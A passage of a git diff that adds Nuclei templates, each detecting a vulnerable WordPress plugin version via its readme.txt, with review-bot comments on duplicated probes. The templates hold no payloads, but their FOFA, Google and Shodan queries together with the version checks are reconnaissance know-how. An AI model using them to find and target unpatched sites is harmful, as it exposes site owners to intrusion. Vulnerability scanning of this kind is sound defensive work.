CVE-2024-53278 + metadata: + fofa-query: "wp-content/plugins/wp-admin-ui-customize/" + google-query: inurl:"/wp-content/plugins/wp-admin-ui-customize/" + shodan-query: 'vuln:CVE-2024-53278' + tags: cve,wordpress,wp-plugin,wp-admin-ui-customize,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-admin-ui-customize/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-admin-ui-customize" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.13') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-53725.yaml b/poc/cve/CVE-2024-53725.yaml new file mode 100644 index 0000000000..766c5970a3 --- /dev/null +++ b/poc/cve/CVE-2024-53725.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53725-b1549800e4f49f80a8abddc499383424 + +info: + name: > + Post Hits Counter <= 2.8.23 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Post Hits Counter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 2.8.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/746bf178-5e1b-4f1a-8072-d0c1be005f88?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-53725 + metadata: + fofa-query: "wp-content/plugins/hits-counter/" + google-query: inurl:"/wp-content/plugins/hits-counter/" + shodan-query: 'vuln:CVE-2024-53725' + tags: cve,wordpress,wp-plugin,hits-counter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hits-counter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hits-counter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53729.yaml b/poc/cve/CVE-2024-53729.yaml new file mode 100644 index 0000000000..821dd75678 
--- /dev/null +++ b/poc/cve/CVE-2024-53729.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53729-792d23502d5d4d568b4da98319a2bf83 + +info: + name: > + Blizzard Quotes <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blizzard Quotes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06d4a12c-9503-4e89-85e7-64838a42dc28?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-53729 + metadata: + fofa-query: "wp-content/plugins/blizzard-quotes/" + google-query: inurl:"/wp-content/plugins/blizzard-quotes/" + shodan-query: 'vuln:CVE-2024-53729' + tags: cve,wordpress,wp-plugin,blizzard-quotes,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blizzard-quotes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blizzard-quotes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53737.yaml b/poc/cve/CVE-2024-53737.yaml new file mode 100644 index 0000000000..44b8ddb8f6 --- /dev/null +++ b/poc/cve/CVE-2024-53737.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-53737-d75fb3be3b1507d8a5102b9146c5ac69 + +info: + name: > + WP Mailster <= 1.8.16.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.8.16.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e451df35-8448-4791-859e-969dc97a1aa8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-53737 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53737' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53738.yaml b/poc/cve/CVE-2024-53738.yaml new file mode 100644 index 0000000000..5f4c25e3f3 --- /dev/null +++ b/poc/cve/CVE-2024-53738.yaml 
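Review bot: This template and four later ones in the commit (CVE-2024-53803, CVE-2024-53804, CVE-2024-53805, CVE-2024-53807) send the same request to `/wp-content/plugins/wp-mailster/readme.txt` and apply the same `<= 1.8.16.0` comparison, so one host yields five findings from a single piece of evidence. None of them checks the affected function, so the results cannot be told apart and are hard to deduplicate in a report. A comment in each, such as `# shares its probe with the other wp-mailster <= 1.8.16.0 templates; one outdated install triggers all of them`, would make that explicit to whoever triages the output.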
@@ -0,0 +1,59 @@ +id: CVE-2024-53738-f9b4da473884d91136fd1add1208b51e + +info: + name: > + Asset CleanUp: Page Speed Booster <= 1.3.9.8 - Authenticated (Admin+) Server-Side Request Forgery + author: topscoder + severity: low + description: > + The Asset CleanUp: Page Speed Booster plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.9.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5617f917-ecb5-4c64-b421-e4af14c17eb7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-53738 + metadata: + fofa-query: "wp-content/plugins/wp-asset-clean-up/" + google-query: inurl:"/wp-content/plugins/wp-asset-clean-up/" + shodan-query: 'vuln:CVE-2024-53738' + tags: cve,wordpress,wp-plugin,wp-asset-clean-up,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-asset-clean-up/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-asset-clean-up" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53739.yaml b/poc/cve/CVE-2024-53739.yaml new file mode 100644 index 0000000000..9aecf1b47a --- /dev/null +++ b/poc/cve/CVE-2024-53739.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-53739-245349b994f894d211d92e07e7132e02 + +info: + name: > + Cryptocurrency Widgets For Elementor <= 1.6.4 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The Cryptocurrency Widgets For Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.4. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4723aef-f248-47aa-b53b-ed1ab189bf2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-53739 + metadata: + fofa-query: "wp-content/plugins/cryptocurrency-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/cryptocurrency-widgets-for-elementor/" + shodan-query: 'vuln:CVE-2024-53739' + tags: cve,wordpress,wp-plugin,cryptocurrency-widgets-for-elementor,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cryptocurrency-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cryptocurrency-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-53803.yaml b/poc/cve/CVE-2024-53803.yaml new file mode 100644 index 0000000000..29e63d7726 --- /dev/null +++ b/poc/cve/CVE-2024-53803.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53803-7c065e8dc8daf36d5150824cdcc9233f + +info: + name: > + WP Mailster <= 1.8.16.0 - Missing Authorization + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.8.16.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/900cfb6d-61c8-4696-9a5d-1ff03cd76a22?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 6.5 + cve-id: CVE-2024-53803 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53803' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53804.yaml b/poc/cve/CVE-2024-53804.yaml new file mode 100644 index 0000000000..c65bb043ac --- /dev/null +++ b/poc/cve/CVE-2024-53804.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-53804-7f7eb1b52516912e3dcbd3b07c0abf16 + +info: + name: > + WP Mailster <= 1.8.16.0 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The WP Mailster plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.16.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e31ecd7e-95ea-4a35-ae6d-ad3c61b1cae9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-53804 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53804' + tags: cve,wordpress,wp-plugin,wp-mailster,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53805.yaml b/poc/cve/CVE-2024-53805.yaml new file mode 100644 index 0000000000..36f849bbf1 --- /dev/null +++ b/poc/cve/CVE-2024-53805.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-53805-36ba7e73c93e1a24c1943bbb34e10a80 + +info: + name: > + WP Mailster <= 1.8.16.0 - Missing Authorization + author: topscoder + severity: high + description: > + The WP Mailster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.8.16.0. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/697105e6-3155-4199-9fee-914830674023?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2024-53805 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53805' + tags: cve,wordpress,wp-plugin,wp-mailster,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53807.yaml b/poc/cve/CVE-2024-53807.yaml new file mode 100644 index 0000000000..b21045cc2a --- /dev/null +++ b/poc/cve/CVE-2024-53807.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-53807-b4800b9f2218096c453e2fb7ff8deaba + +info: + name: > + WP Mailster <= 1.8.16.0 - Authenticated (Contributor+) SQL Injection via orderby + author: topscoder + severity: low + description: > + The WP Mailster plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.8.16.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9baf0a14-600b-4c0e-9121-71c28653e530?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-53807 + metadata: + fofa-query: "wp-content/plugins/wp-mailster/" + google-query: inurl:"/wp-content/plugins/wp-mailster/" + shodan-query: 'vuln:CVE-2024-53807' + tags: cve,wordpress,wp-plugin,wp-mailster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mailster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mailster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.16.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53808.yaml b/poc/cve/CVE-2024-53808.yaml new file mode 100644 index 0000000000..64cf087f99 --- /dev/null +++ b/poc/cve/CVE-2024-53808.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-53808-734202edafa17e1da99062a92085d7fe
+
+info:
+ name: >
+ NEX-Forms – Ultimate Form Builder <= 8.7.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The NEX-Forms – Ultimate Form Builder plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 8.7.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f0406ad-8f4e-49a2-87dd-a6e319904652?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-53808
+ metadata:
+ fofa-query: "wp-content/plugins/nex-forms-express-wp-form-builder/"
+ google-query: inurl:"/wp-content/plugins/nex-forms-express-wp-form-builder/"
+ shodan-query: 'vuln:CVE-2024-53808'
+ tags: cve,wordpress,wp-plugin,nex-forms-express-wp-form-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nex-forms-express-wp-form-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nex-forms-express-wp-form-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.7.8')
\ No newline at end of file
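Review bot: The two `extractors` entries in CVE-2024-53808.yaml are identical apart from `internal: true`, both are named `version`, and nothing explains why the regex is declared twice. Presumably the internal copy feeds `compare_versions(...)` and the second one only prints the version in the result; if so, a comment above the first entry such as `# internal copy feeds the dsl matcher; the copy below only reports the value` would stop a maintainer from deleting one as a duplicate. The pattern `[0-9.]+` also yields no `version` at all for a non-numeric stable tag such as `trunk`, so the template stays silent on those sites, which is worth stating in the same comment. The same pair is repeated in every template in this part of the patch.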
diff --git a/poc/cve/CVE-2024-53812.yaml b/poc/cve/CVE-2024-53812.yaml
new file mode 100644
index 0000000000..e915e4a16d
--- /dev/null
+++ b/poc/cve/CVE-2024-53812.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53812-f7722f28837f9ffee33d0d19cbdc6579
+
+info:
+ name: >
+ WP GeoNames <= 1.8 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP GeoNames plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb13522-95d7-428a-bbc6-e278f814e863?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53812
+ metadata:
+ fofa-query: "wp-content/plugins/wp-geonames/"
+ google-query: inurl:"/wp-content/plugins/wp-geonames/"
+ shodan-query: 'vuln:CVE-2024-53812'
+ tags: cve,wordpress,wp-plugin,wp-geonames,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-geonames/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-geonames"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53815.yaml b/poc/cve/CVE-2024-53815.yaml
new file mode 100644
index 0000000000..335311395c
--- /dev/null
+++ b/poc/cve/CVE-2024-53815.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53815-2e40699b6c5f7ad5936edd6b07104f72
+
+info:
+ name: >
+ Pinpoint Booking System <= 2.9.9.5.1 - Authenticated (Subscriber+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Pinpoint Booking System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.9.9.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f673e463-5ef0-4704-91a1-76e375df9d1c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-53815
+ metadata:
+ fofa-query: "wp-content/plugins/booking-system/"
+ google-query: inurl:"/wp-content/plugins/booking-system/"
+ shodan-query: 'vuln:CVE-2024-53815'
+ tags: cve,wordpress,wp-plugin,booking-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.9.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53817.yaml b/poc/cve/CVE-2024-53817.yaml
new file mode 100644
index 0000000000..050d5c0f12
--- /dev/null
+++ b/poc/cve/CVE-2024-53817.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53817-c6b5a8cf44ad040cab396afbb639a133
+
+info:
+ name: >
+ Product Labels For Woocommerce <= 1.5.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Product Labels For Woocommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.5.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fcbe5bfa-7680-452e-bb18-ea9fbbb07b8e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-53817
+ metadata:
+ fofa-query: "wp-content/plugins/aco-product-labels-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/aco-product-labels-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-53817'
+ tags: cve,wordpress,wp-plugin,aco-product-labels-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/aco-product-labels-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "aco-product-labels-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53818.yaml b/poc/cve/CVE-2024-53818.yaml
new file mode 100644
index 0000000000..a5fcc1d0ad
--- /dev/null
+++ b/poc/cve/CVE-2024-53818.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53818-7859a96404bfca0d2fce23fb1104c8ba
+
+info:
+ name: >
+ PostX <= 4.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/af55ea6c-01f6-4c87-91bb-a0ff98e92256?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53818
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-post/"
+ google-query: inurl:"/wp-content/plugins/ultimate-post/"
+ shodan-query: 'vuln:CVE-2024-53818'
+ tags: cve,wordpress,wp-plugin,ultimate-post,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.15')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53819.yaml b/poc/cve/CVE-2024-53819.yaml
new file mode 100644
index 0000000000..36fdaf3a9f
--- /dev/null
+++ b/poc/cve/CVE-2024-53819.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53819-ed57d3a9059f066ad18459455b0d7bd1
+
+info:
+ name: >
+ Client Invoicing by Sprout Invoices <= 20.8.0 - Insecure Direct Object Reference
+ author: topscoder
+ severity: medium
+ description: >
+ The Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 20.8.0 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to act on objects they shouldn't be able to manipulate.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/326e168d-c2ae-485f-93ff-ed59d5b6061e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-53819
+ metadata:
+ fofa-query: "wp-content/plugins/sprout-invoices/"
+ google-query: inurl:"/wp-content/plugins/sprout-invoices/"
+ shodan-query: 'vuln:CVE-2024-53819'
+ tags: cve,wordpress,wp-plugin,sprout-invoices,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sprout-invoices/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sprout-invoices"
